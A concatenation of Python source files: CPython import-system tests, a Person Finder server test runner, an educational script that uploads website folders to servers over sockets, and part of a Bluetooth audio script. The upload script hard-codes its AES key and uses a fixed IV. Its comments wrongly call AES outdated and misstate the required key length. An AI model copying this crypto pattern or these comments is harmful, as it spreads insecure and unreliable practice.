import package2.submodule1
package2.submodule1.submodule2
class OverridingImportBuiltinTests(unittest.TestCase):
def test_override_builtin(self):
# Test that overriding builtins.__import__ can bypass sys.modules.
import os
def foo():
import os
return os
self.assertEqual(foo(), os) # Quick sanity check.
with swap_attr(builtins, "__import__", lambda *x: 5):
self.assertEqual(foo(), 5)
# Test what happens when we shadow __import__ in globals(); this
# currently does not impact the import process, but if this changes,
# other code will need to change, so keep this test as a tripwire.
with swap_item(globals(), "__import__", lambda *x: 5):
self.assertEqual(foo(), os)
class PycacheTests(unittest.TestCase):
# Test the various PEP 3147/488-related behaviors.
def _clean(self):
forget(TESTFN)
rmtree('__pycache__')
unlink(self.source)
def setUp(self):
self.source = TESTFN + '.py'
self._clean()
with open(self.source, 'w') as fp:
print('# This is a test file written by test_import.py', file=fp)
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
def tearDown(self):
assert sys.path[0] == os.curdir, 'Unexpected sys.path[0]'
del sys.path[0]
self._clean()
@skip_if_dont_write_bytecode
def test_import_pyc_path(self):
self.assertFalse(os.path.exists('__pycache__'))
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} does not '
'exist'.format(pyc_path, TESTFN))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
@unittest.skipIf(hasattr(os, 'geteuid') and os.geteuid() == 0,
"due to varying filesystem permission semantics (issue #11956)")
@skip_if_dont_write_bytecode
def test_unwritable_directory(self):
# When the umask causes the new __pycache__ directory to be
# unwritable, the import still succeeds but no .pyc file is written.
with temp_umask(0o222):
__import__(TESTFN)
self.assertTrue(os.path.exists('__pycache__'))
pyc_path = importlib.util.cache_from_source(self.source)
self.assertFalse(os.path.exists(pyc_path),
'bytecode file {!r} for {!r} '
'exists'.format(pyc_path, TESTFN))
@skip_if_dont_write_bytecode
def test_missing_source(self):
# With PEP 3147 cache layout, removing the source but leaving the pyc
# file does not satisfy the import.
__import__(TESTFN)
pyc_file = importlib.util.cache_from_source(self.source)
self.assertTrue(os.path.exists(pyc_file))
os.remove(self.source)
forget(TESTFN)
importlib.invalidate_caches()
self.assertRaises(ImportError, __import__, TESTFN)
@skip_if_dont_write_bytecode
def test_missing_source_legacy(self):
# Like test_missing_source() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __file__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
try:
self.assertEqual(m.__file__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
finally:
os.remove(pyc_file)
def test___cached__(self):
# Modules now also have an __cached__ that points to the pyc file.
m = __import__(TESTFN)
pyc_file = importlib.util.cache_from_source(TESTFN + '.py')
self.assertEqual(m.__cached__, os.path.join(os.curdir, pyc_file))
@skip_if_dont_write_bytecode
def test___cached___legacy_pyc(self):
# Like test___cached__() except that for backward compatibility,
# when the pyc file lives where the py file would have been (and named
# without the tag), it is importable. The __cached__ of the imported
# module is the pyc location.
__import__(TESTFN)
# pyc_file gets removed in _clean() via tearDown().
pyc_file = make_legacy_pyc(self.source)
os.remove(self.source)
unload(TESTFN)
importlib.invalidate_caches()
m = __import__(TESTFN)
self.assertEqual(m.__cached__,
os.path.join(os.curdir, os.path.relpath(pyc_file)))
@skip_if_dont_write_bytecode
def test_package___cached__(self):
# Like test___cached__ but for packages.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_package___cached___from_pyc(self):
# Like test___cached__ but ensuring __cached__ when imported from a
# PEP 3147 pyc file.
def cleanup():
rmtree('pep3147')
unload('pep3147.foo')
unload('pep3147')
os.mkdir('pep3147')
self.addCleanup(cleanup)
# Touch the __init__.py
with open(os.path.join('pep3147', '__init__.py'), 'w'):
pass
with open(os.path.join('pep3147', 'foo.py'), 'w'):
pass
importlib.invalidate_caches()
m = __import__('pep3147.foo')
unload('pep3147.foo')
unload('pep3147')
importlib.invalidate_caches()
m = __import__('pep3147.foo')
init_pyc = importlib.util.cache_from_source(
os.path.join('pep3147', '__init__.py'))
self.assertEqual(m.__cached__, os.path.join(os.curdir, init_pyc))
foo_pyc = importlib.util.cache_from_source(os.path.join('pep3147', 'foo.py'))
self.assertEqual(sys.modules['pep3147.foo'].__cached__,
os.path.join(os.curdir, foo_pyc))
def test_recompute_pyc_same_second(self):
# Even when the source file doesn't change timestamp, a change in
# source size is enough to trigger recomputation of the pyc file.
__import__(TESTFN)
unload(TESTFN)
with open(self.source, 'a') as fp:
print("x = 5", file=fp)
m = __import__(TESTFN)
self.assertEqual(m.x, 5)
class TestSymbolicallyLinkedPackage(unittest.TestCase):
package_name = 'sample'
tagged = package_name + '-tagged'
def setUp(self):
test.support.rmtree(self.tagged)
test.support.rmtree(self.package_name)
self.orig_sys_path = sys.path[:]
# create a sample package; imagine you have a package with a tag and
# you want to symbolically link it from its untagged name.
os.mkdir(self.tagged)
self.addCleanup(test.support.rmtree, self.tagged)
init_file = os.path.join(self.tagged, '__init__.py')
test.support.create_empty_file(init_file)
assert os.path.exists(init_file)
# now create a symlink to the tagged package
# sample -> sample-tagged
os.symlink(self.tagged, self.package_name, target_is_directory=True)
self.addCleanup(test.support.unlink, self.package_name)
importlib.invalidate_caches()
self.assertEqual(os.path.isdir(self.package_name), True)
assert os.path.isfile(os.path.join(self.package_name, '__init__.py'))
def tearDown(self):
sys.path[:] = self.orig_sys_path
# regression test for issue6727
@unittest.skipUnless(
not hasattr(sys, 'getwindowsversion')
or sys.getwindowsversion() >= (6, 0),
"Windows Vista or later required")
@test.support.skip_unless_symlink
def test_symlinked_dir_importable(self):
# make sure sample can only be imported from the current directory.
sys.path[:] = ['.']
assert os.path.exists(self.package_name)
assert os.path.exists(os.path.join(self.package_name, '__init__.py'))
# Try to import the package
importlib.import_module(self.package_name)
@cpython_only
class ImportlibBootstrapTests(unittest.TestCase):
# These tests check that importlib is bootstrapped.
def test_frozen_importlib(self):
mod = sys.modules['_frozen_importlib']
self.assertTrue(mod)
def test_frozen_importlib_is_bootstrap(self):
from importlib import _bootstrap
mod = sys.modules['_frozen_importlib']
self.assertIs(mod, _bootstrap)
self.assertEqual(mod.__name__, 'importlib._bootstrap')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap.py'), mod.__file__)
def test_frozen_importlib_external_is_bootstrap_external(self):
from importlib import _bootstrap_external
mod = sys.modules['_frozen_importlib_external']
self.assertIs(mod, _bootstrap_external)
self.assertEqual(mod.__name__, 'importlib._bootstrap_external')
self.assertEqual(mod.__package__, 'importlib')
self.assertTrue(mod.__file__.endswith('_bootstrap_external.py'), mod.__file__)
def test_there_can_be_only_one(self):
# Issue #15386 revealed a tricky loophole in the bootstrapping
# This test is technically redundant, since the bug caused importing
# this test module to crash completely, but it helps prove the point
from importlib import machinery
mod = sys.modules['_frozen_importlib']
self.assertIs(machinery.ModuleSpec, mod.ModuleSpec)
@cpython_only
class GetSourcefileTests(unittest.TestCase):
"""Test importlib._bootstrap_external._get_sourcefile() as used by the C API.
Because of the peculiarities of the need of this function, the tests are
knowingly whitebox tests.
"""
def test_get_sourcefile(self):
# Given a valid bytecode path, return the path to the corresponding
# source file if it exists.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = True;
path = TESTFN + '.pyc'
expect = TESTFN + '.py'
self.assertEqual(_get_sourcefile(path), expect)
def test_get_sourcefile_no_source(self):
# Given a valid bytecode path without a corresponding source path,
# return the original bytecode path.
with mock.patch('importlib._bootstrap_external._path_isfile') as _path_isfile:
_path_isfile.return_value = False;
path = TESTFN + '.pyc'
self.assertEqual(_get_sourcefile(path), path)
def test_get_sourcefile_bad_ext(self):
# Given a path with an invalid bytecode extension, return the
# bytecode path passed as the argument.
path = TESTFN + '.bad_ext'
self.assertEqual(_get_sourcefile(path), path)
class ImportTracebackTests(unittest.TestCase):
def setUp(self):
os.mkdir(TESTFN)
self.old_path = sys.path[:]
sys.path.insert(0, TESTFN)
def tearDown(self):
sys.path[:] = self.old_path
rmtree(TESTFN)
def create_module(self, mod, contents, ext=".py"):
fname = os.path.join(TESTFN, mod + ext)
with open(fname, "w") as f:
f.write(contents)
self.addCleanup(unload, mod)
importlib.invalidate_caches()
return fname
def assert_traceback(self, tb, files):
deduped_files = []
while tb:
code = tb.tb_frame.f_code
fn = code.co_filename
if not deduped_files or fn != deduped_files[-1]:
deduped_files.append(fn)
tb = tb.tb_next
self.assertEqual(len(deduped_files), len(files), deduped_files)
for fn, pat in zip(deduped_files, files):
self.assertIn(pat, fn)
def test_nonexistent_module(self):
try:
# assertRaises() clears __traceback__
import nonexistent_xyzzy
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__])
def test_nonexistent_module_nested(self):
self.create_module("foo", "import nonexistent_xyzzy")
try:
import foo
except ImportError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure(self):
self.create_module("foo", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py'])
def test_exec_failure_nested(self):
self.create_module("foo", "import bar")
self.create_module("bar", "1/0")
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, 'foo.py', 'bar.py'])
# A few more examples from issue #15425
def test_syntax_error(self):
self.create_module("foo", "invalid syntax is invalid")
try:
import foo
except SyntaxError as e:
tb = e.__traceback__
else:
self.fail("SyntaxError should have been raised")
self.assert_traceback(tb, [__file__])
def _setup_broken_package(self, parent, child):
pkg_name = "_parent_foo"
self.addCleanup(unload, pkg_name)
pkg_path = os.path.join(TESTFN, pkg_name)
os.mkdir(pkg_path)
# Touch the __init__.py
init_path = os.path.join(pkg_path, '__init__.py')
with open(init_path, 'w') as f:
f.write(parent)
bar_path = os.path.join(pkg_path, 'bar.py')
with open(bar_path, 'w') as f:
f.write(child)
importlib.invalidate_caches()
return init_path, bar_path
def test_broken_submodule(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_from(self):
init_path, bar_path = self._setup_broken_package("", "1/0")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ImportError should have been raised")
self.assert_traceback(tb, [__file__, bar_path])
def test_broken_parent(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
import _parent_foo.bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
def test_broken_parent_from(self):
init_path, bar_path = self._setup_broken_package("1/0", "")
try:
from _parent_foo import bar
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, init_path])
@cpython_only
def test_import_bug(self):
# We simulate a bug in importlib and check that it's not stripped
# away from the traceback.
self.create_module("foo", "")
importlib = sys.modules['_frozen_importlib_external']
if 'load_module' in vars(importlib.SourceLoader):
old_exec_module = importlib.SourceLoader.exec_module
else:
old_exec_module = None
try:
def exec_module(*args):
1/0
importlib.SourceLoader.exec_module = exec_module
try:
import foo
except ZeroDivisionError as e:
tb = e.__traceback__
else:
self.fail("ZeroDivisionError should have been raised")
self.assert_traceback(tb, [__file__, '<frozen importlib', __file__])
finally:
if old_exec_module is None:
del importlib.SourceLoader.exec_module
else:
importlib.SourceLoader.exec_module = old_exec_module
@unittest.skipUnless(TESTFN_UNENCODABLE, 'need TESTFN_UNENCODABLE')
def test_unencodable_filename(self):
# Issue #11619: The Python parser and the import machinery must not
# encode filenames, especially on Windows
pyname = script_helper.make_script('', TESTFN_UNENCODABLE, 'pass')
self.addCleanup(unlink, pyname)
name = pyname[:-3]
script_helper.assert_python_ok("-c", "mod = __import__(%a)" % name,
__isolated=False)
class CircularImportTests(unittest.TestCase):
"""See the docstrings of the modules being imported for the purpose of the
test."""
def tearDown(self):
"""Make sure no modules pre-exist in sys.modules which are being used to
test."""
for key in list(sys.modules.keys()):
if key.startswith('test.test_import.data.circular_imports'):
del sys.modules[key]
def test_direct(self):
try:
import test.test_import.data.circular_imports.basic
except ImportError:
self.fail('circular import through relative imports failed')
def test_indirect(self):
try:
import test.test_import.data.circular_imports.indirect
except ImportError:
self.fail('relative import in module contributing to circular '
'import failed')
def test_subpackage(self):
try:
import test.test_import.data.circular_imports.subpackage
except ImportError:
self.fail('circular import involving a subpackage failed')
def test_rebinding(self):
try:
import test.test_import.data.circular_imports.rebinding as rebinding
except ImportError:
self.fail('circular import with rebinding of module attribute failed')
from test.test_import.data.circular_imports.subpkg import util
self.assertIs(util.util, rebinding.util)
if __name__ == '__main__':
# Test needs to be a package, so we can do relative imports.
unittest.main()
|
server_tests.py
|
# Copyright 2012 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starts up an appserver and runs end-to-end tests against it.
Instead of running this script directly, use the 'server_tests' shell script,
which sets up the PYTHONPATH and other necessary environment variables.
The actual test cases reside in server_test_cases.py.
Use -k to select particular test classes or methods by a substring match:
tools/server_tests -k ConfigTests
tools/server_tests -k test_delete_and_restore
Specify -v to show the name of each test as it runs (rather than just dots).
Specify -s to see the messages printed by all tests as they run (by default,
stdout/stderr will be captured and then shown only for failing tests).
"""
from __future__ import print_function
import os
import pytest
import re
import signal
import smtpd
import subprocess
import sys
import tempfile
import threading
import time
from model import *
import remote_api
import setup_pf as setup
class ProcessRunner(threading.Thread):
"""A thread that starts a subprocess, collects its output, and stops it."""
READY_RE = re.compile('') # this output means the process is ready
ERROR_RE = re.compile('ERROR|CRITICAL') # output indicating failure
OMIT_RE = re.compile('INFO |WARNING ') # don't bother showing these lines
# this output is for appserver's port error
BIND_RE = re.compile('BindError: Unable to bind (.*):(\d+)')
debug = False # set to True to see all log messages, ignoring OMIT_RE
def __init__(self, name, args):
threading.Thread.__init__(self)
self.name = name
self.args = args
self.process = None # subprocess.Popen instance
self.ready = False # process is running and ready
self.failed = False # process emitted an error message in its output
self.output = []
def run(self):
"""Starts the subprocess and collects its output while it runs."""
self.process = subprocess.Popen(
self.args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,
close_fds=True)
# Each subprocess needs a thread to be watching it and absorbing its
# output; otherwise it will block when its stdout pipe buffer fills.
self.start_watching_output(self.process.stdout)
self.start_watching_output(self.process.stderr)
self.process.wait()
def start_watching_output(self, output):
stdout_thread = threading.Thread(target=self.watch_output, args=(output,))
stdout_thread.setDaemon(True)
stdout_thread.start()
def watch_output(self, output):
while self.process.poll() is None:
line = output.readline()
if not line: # process finished
return
if self.READY_RE.search(line):
self.ready = True
if not self.debug and self.OMIT_RE.search(line): # omit these lines
continue
if self.ERROR_RE.search(line): # something went wrong
self.failed = True
if line.strip():
self.output.append(line.strip('\n'))
def stop(self):
"""Terminates the subprocess and returns its status code."""
if self.process: # started
if self.isAlive(): # still running
os.kill(self.process.pid, signal.SIGINT)
else:
self.failed = self.process.returncode != 0
self.clean_up()
if self.failed:
self.flush_output()
print('%s failed (status %s).\n' % (
self.name, self.process.returncode), file=sys.stderr)
else:
print('%s stopped.' % self.name, file=sys.stderr)
def flush_output(self):
"""Flushes the buffered output from this subprocess to stderr."""
self.output, lines_to_print = [], self.output
if lines_to_print:
sys.stderr.write('\n--- output from %s ---\n' % self.name)
sys.stderr.write('\n'.join(lines_to_print) + '\n\n')
def wait_until_ready(self, timeout=10):
"""Waits until the subprocess has logged that it is ready."""
fail_time = time.time() + timeout
while self.isAlive() and not self.ready and time.time() < fail_time:
for jiffy in range(10): # wait one second, aborting early if ready
if not self.ready:
time.sleep(0.1)
if not self.ready:
self.flush_output() # after each second, show output
if self.ready:
print('%s started.' % self.name, file=sys.stderr)
else:
raise RuntimeError('%s failed to start.' % self.name)
def clean_up(self):
pass
class AppServerRunner(ProcessRunner):
"""Manages a dev_appserver subprocess."""
READY_RE = re.compile('Starting module "default" running at|Running application')
OMIT_RE = re.compile(
'INFO |WARNING |DeprecationWarning: get_request_cpu_usage')
def __init__(self, port, smtp_port):
self.__datastore_file = tempfile.NamedTemporaryFile()
ProcessRunner.__init__(self, 'appserver', [
os.environ['PYTHON'],
os.path.join(os.environ['APPENGINE_DIR'], 'dev_appserver.py'),
os.environ['APP_DIR'],
'--port=%s' % port,
'--datastore_path=%s' % self.__datastore_file.name,
'--require_indexes',
'--smtp_host=localhost',
'--smtp_port=%d' % smtp_port,
# By default, if we perform a datastore write and a query in this
# order, the query may see the data before the write is applied.
# This is the behavior in the production, but it is inconvenient
# to perform server tests, because we often perform a database
# write then test if it's visible in the web page. This flag makes
# sure that the query see the data after the write is applied.
'--datastore_consistency_policy=consistent',
# We'll get notified if we're behind when we run local instances,
# and we don't want this to get in the way of automated tests (it
# will stop everything and wait for user input when it asks
# permission to check).
'--skip_sdk_update_check',
])
def flush_output(self):
"""Flushes the buffered output from this subprocess to stderr."""
self.output, original_output = [], self.output
if original_output:
original_output_text = '\n'.join(original_output)
match = self.BIND_RE.search(original_output_text, re.MULTILINE)
if match:
host = match.group(1)
port = match.group(2)
sys.stderr.write('%s failed %s port %s is already in use.\n' %
(self.name, host, port))
sys.stderr.write('Please turn down local Person Finder ' +
'server or the server test if any.\n\n')
else:
sys.stderr.write('\n--- output from %s ---\n' % self.name)
sys.stderr.write(original_output_text + '\n\n')
class MailThread(threading.Thread):
"""Runs an SMTP server and stores the incoming messages."""
messages = []
def __init__(self, port):
threading.Thread.__init__(self)
self.port = port
self.stop_requested = False
def run(self):
class MailServer(smtpd.SMTPServer):
def process_message(self, peer, mailfrom, rcpttos, data):
print('mail from:', mailfrom, 'to:', rcpttos, file=sys.stderr)
MailThread.messages.append(
{'from': mailfrom, 'to': rcpttos, 'data': data})
try:
server = MailServer(('localhost', self.port), None)
except Exception, e:
print('SMTP server failed: %s' % e, file=sys.stderr)
sys.exit(-1)
print('SMTP server started.', file=sys.stderr)
while not self.stop_requested:
smtpd.asyncore.loop(timeout=0.5, count=1)
print('SMTP server stopped.', file=sys.stderr)
def stop(self):
self.stop_requested = True
def wait_until_ready(self, timeout=10):
pass
def flush_output(self):
pass
class PyTestPlugin:
"""A plugin for pytest that does the setup and teardown for server tests."""
def __init__(self):
self.threads = []
def pytest_addoption(self, parser):
group = parser.getgroup(
'server_tests', 'App Engine server testing', after='general')
group.addoption('--server',
help='appserver URL (default: localhost:8081)')
group.addoption('--port', type='int', default=8081,
help='appserver port number (default: 8081)')
group.addoption('--mailport', type='int', default=8025,
help='SMTP server port number (default: 8025)')
def pytest_configure(self, config):
options = config.option
url = options.server or 'localhost:%d' % options.port
secure, host, port, path = remote_api.parse_url(url)
if host == 'localhost':
# We need to start up a clean new appserver for testing.
self.threads.append(AppServerRunner(options.port, options.mailport))
self.threads.append(MailThread(options.mailport))
for thread in self.threads:
thread.start()
for thread in self.threads:
thread.wait_until_ready()
# Connect to the datastore.
remote_api.connect(url, server_type='local')
# Reset the datastore for the first test.
reset_data()
# Give the tests access to configuration information.
config.hostport = '%s:%d' % (host, port)
config.mail_server = MailThread
def pytest_unconfigure(self, config):
for thread in self.threads:
if hasattr(thread, 'flush_output'):
thread.flush_output()
for thread in self.threads:
thread.stop()
thread.join()
def pytest_runtest_setup(self):
MailThread.messages = []
def reset_data():
"""Reset the datastore to a known state, populated with test data."""
setup.reset_datastore()
db.put([
Authorization.create(
'haiti', 'test_key', domain_write_permission='test.google.com'),
Authorization.create(
'haiti', 'domain_test_key',
domain_write_permission='mytestdomain.com'),
Authorization.create(
'haiti', 'reviewed_test_key',
domain_write_permission='test.google.com',
mark_notes_reviewed=True),
Authorization.create(
'haiti', 'not_allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=False),
Authorization.create(
'haiti', 'allow_believed_dead_test_key',
domain_write_permission='test.google.com',
believed_dead_permission=True),
Authorization.create(
'haiti', 'other_key', domain_write_permission='other.google.com'),
Authorization.create(
'haiti', 'read_key', read_permission=True),
Authorization.create(
'haiti', 'full_read_key', full_read_permission=True),
Authorization.create(
'haiti', 'search_key', search_permission=True),
Authorization.create(
'haiti', 'subscribe_key', subscribe_permission=True),
Authorization.create(
'*', 'global_test_key',
domain_write_permission='globaltestdomain.com'),
# An API key which can be used for SMS API.
Authorization.create(
'*',
'sms_key',
search_permission=True,
domain_write_permission='*'),
])
def monkeypatch_pytest_terminal_reporter():
"""Improves the output produced by _pytest.terminal.TerminalReporter."""
import _pytest.terminal
def write_sep(self, sep, title=None, **markup):
if sep == '_':
markup['cyan'] = 1 # highlight the failed test name in cyan
self._tw.line() # put a blank line before the failure report
self._tw.sep(sep, title, **markup)
_pytest.terminal.TerminalReporter.write_sep = write_sep
if __name__ == '__main__':
monkeypatch_pytest_terminal_reporter()
# Run the tests, using sys.exit to set exit status (nonzero for failure).
sys.exit(pytest.main(plugins=[PyTestPlugin()]))
|
upload_website.py
|
import sys
import re
import os
import socket
import pickle
from Cryptodome.Cipher import AES
from Cryptodome.Util.Padding import pad
import threading
import time
AES_ENCRYPTION_KEY = b"N44vCTcb<W8sBXD@"
AES_BLOCKSIZE = 16
AES_IV = b"PoTFg9ZlV?g(bH8Z"
MIN_ARGS_LEN = 3
IP_PATTERN = r'^((1[0-9]{2}|2[0-4][0-9]|25[0-5]|[0-9]{1,2})\.){3}(1[0-9]{2}|2[0-4][0-9]|25[0-5]|[0-9]{1,2})$'
SERVER_PORT = 1337
CHUNK_SIZE = 16384
websites = []
server_ips = []
def validate_args():
'''
This function validates the sys.argv arguments that the user gave to the program.
'''
# Check if the args amount is valid
if len(sys.argv) < MIN_ARGS_LEN:
print('\nError:\tInvalid syntax.')
print('\nUSAGE\n\tpython %s websites_folder_path server_ip [server_ip2 server_ip3 ...]\n' % (__file__))
print('NOTES\n\twebsites_folder_path\tThe folder in which the user would be able to upload website-folders to.')
print('\tserver_ip\t\tThe ip of the server that the website will be uploaded to.\n')
print('EXAMPLES\n\tSingle server:\t\tpython %s WebsiteExampleFolder 192.168.0.45\n' % (__file__))
print('\tMultiple servers:\tpython %s WebsiteExampleFolder 192.168.0.45 192.168.0.88\n' % (__file__))
return False
# Check if the given path exists
if not os.path.exists(sys.argv[1]):
print('\nError:\tWebsite Folder does not exist.')
print('Try giving an existing folder.\n')
return False
# Check if the given path is a folder
if not os.path.isdir(sys.argv[1]):
print('\nError:\tThe given path is not a folder.')
print('Try giving an path in which website folders will be stored.\n')
return False
# Check if the given IP addresses are valid
for ip_address in sys.argv[2:]:
if re.match(IP_PATTERN, ip_address) == None:
print('\nError:\tInvalid IP address.')
print('Note:\ta.b.c.d, where a-d are numbers between 0-255 (like 172.160.14.0)\n')
return False
return True
def folder_to_json(folder_path):
'''
This function converts the data in a given folder to json format.
The format is:
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [
{
"type" : "file",
"name" : "the name of the file",
"data" : "either textual or binary data"
},
{
"type" : "folder",
"name" : "the name of the folder",
"entries" : [...]
},
...
]
}
'''
print(folder_path)
# Make sure that the folder path is in valid format
folder_path = os.path.abspath(folder_path)
# Initialize the folder dictionary
folder_json = {'type' : 'folder', 'name' : os.path.basename(folder_path)}
folder_json['entries'] = []
# For each entry in the current folder
for entry in os.listdir(folder_path):
entry_full_path = folder_path + '/' + entry
# If the entry is a file, save the file's name and data in dictionary
if os.path.isfile(entry_full_path):
file_json = {'type' : 'file', 'name': entry}
file_data = open(entry_full_path, "rb").read()
file_json['data'] = file_data
# Add the file dictionary to the entries of the current folder
folder_json['entries'].append(file_json)
# If the entry is a folder, get the folder's dictionary recursively, and add it
elif os.path.isdir(entry_full_path):
folder_json['entries'].append(folder_to_json(entry_full_path))
return folder_json
def send_data_in_chunks(sock, data, chunk_size):
'''
This function sends the given data in chunks of size chunk_size using the given socket.
'''
# Encrypt the data
encrypted_data = encrypt_data(data)
data_length = len(encrypted_data)
print('Data length: %d' % (data_length))
# Run through the data list and jump chunk_size elements every time
# Stop when you get to the last chunk, then send the rest of the bytes
for i in range(0, chunk_size * (data_length // chunk_size) + 1, chunk_size):
data_to_send = encrypted_data[i:i + chunk_size]
sock.send(data_to_send)
print(f"Sent: {len(data_to_send)}")
def encrypt_data(data):
'''
This function uses the Cryptodome.Cipher library to encrypt the given data using the AES algoritm.
Note: AES is out dated. The only reason Im using AES is that it's simple for educational purposes.
'''
# Create an instance of a AES object that let's us encrypt our data
# key - The encryption key. Random string hard-coded at the top of the code.
# Note: The same key must be used in the decrypting endpoint, and the key's length must be 8.
# IV - The initial value for the encryption.
# Note: The same IV must be used in the decrypting endpoint, and the IV's length must be 8.
AES_encryptor = AES.new(AES_ENCRYPTION_KEY, AES.MODE_CBC, AES_IV)
# Pad the data to be in length of a multiple of the AES_BLOCKSIZE
# Encrypt the given data, then return it
return AES_encryptor.encrypt(pad(data, AES_BLOCKSIZE))
def upload_website(website_folder_path):
# Convert the given folder to dictionary (json format)
website_folder_json = folder_to_json(website_folder_path)
print('passed')
# Serialize the json for sending
serialized_data = pickle.dumps(website_folder_json)
print(server_ips)
for server_ip in server_ips:
# Initiate connection to endpoint server
connection_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection_socket.connect((server_ip, SERVER_PORT))
# Send the serialized data *length* to the server
connection_socket.send(str(len(serialized_data)).encode())
# Recieve an agreement to send the data
agreement = connection_socket.recv(CHUNK_SIZE)
if agreement == b'OK':
# Send the folder data in chunks
send_data_in_chunks(connection_socket, serialized_data, CHUNK_SIZE)
# Rename the folder while the name is already taken
while connection_socket.recv(CHUNK_SIZE) == b'RENAME':
print('Website name "%s" already taken.' % (os.path.basename(website_folder_json['name'])))
new_name = input('Enter new name: ')
website_folder_json['name'] = os.path.join(os.path.dirname(website_folder_json['name']), new_name)
connection_socket.send(b'NEWNAME:' + new_name.encode())
print('Done.')
else:
print('Failed.')
# End the connection with the server
connection_socket.close()
def main():
# Make sure that the format of the arguments is valid
if not validate_args():
return None
# Save the console arguments in variables
global server_ips
server_ips = sys.argv[2:]
websites_folder_path = sys.argv[1]
# Check which websites are already in the websites folder
websites = os.listdir(websites_folder_path)
# Wait for the user to add a folder to the websites folder
while True:
# Check if there's a change in the websites folder
current_websites = os.listdir(websites_folder_path)
if current_websites != websites:
new_websites = []
# Add all the new websites to the list
for website in current_websites:
if website not in websites:
new_websites.append(website)
# For each new website
print(new_websites)
for new_website in new_websites:
# Upload the new website to the target(s)
threading.Thread(target=upload_website, args=(f"{websites_folder_path}{new_website}",)).start()
# Add the new website to the list of websites
websites.append(new_website)
# Sleep for 1 second
time.sleep(1)
if __name__ == '__main__':
main()
|
main.py
|
import Node as stl
import Scanner as scr
from bluepy.btle import UUID, Scanner, BTLEException
import struct
import sys
import getopt
import math
import random
from collections import deque
from threading import Thread
import os
import argparse
from argparse import ArgumentParser
from subprocess import call
import signal
from signal import SIGPIPE, SIG_DFL
signal.signal(SIGPIPE, SIG_DFL)
if os.getenv('C', '1') == '0':
ANSI_RED = ''
ANSI_GREEN = ''
ANSI_YELLOW = ''
ANSI_CYAN = ''
ANSI_WHITE = ''
ANSI_OFF = ''
else:
ANSI_CSI = "\033["
ANSI_RED = ANSI_CSI + '31m'
ANSI_GREEN = ANSI_CSI + '32m'
ANSI_YELLOW = ANSI_CSI + '33m'
ANSI_CYAN = ANSI_CSI + '36m'
ANSI_WHITE = ANSI_CSI + '37m'
ANSI_OFF = ANSI_CSI + '0m'
queue_audio=deque()
def init_audio(d_out, ff):
global stream
#make a backup of orginal configuration files
call(["cp", "/home/pi/.asoundrc", "/home/pi/.asoundrc_bkp"])
call(["scp", "/etc/asound.conf", "/etc/asound_bkp.conf"])
if ff == 16000:
call(["cp", "./asoundrc_template_16KHz", "/home/pi/.asoundrc"])
call(["scp", "./asoundrc_template_16KHz", "/etc/asound.conf"])
else:
call(["cp", "./asoundrc_template_8KHz", "/home/pi/.asoundrc"])
call(["scp", "./asoundrc_template_8KHz", "/etc/asound.conf"])
import sounddevice as sd
sd.default.channels=1
sd.default.dtype='int16'
devIndex =-1
devF=-1
if d_out == "stl_capture":
devIndex= sd.query_devices().index(sd.query_devices(device="STL_playback"))
devF= sd.query_devices(device="STL_playback")["default_samplerate"]
print("DEVICE: %s INDEX: %s RATE: %s " % ("STL_playback",devIndex, devF))
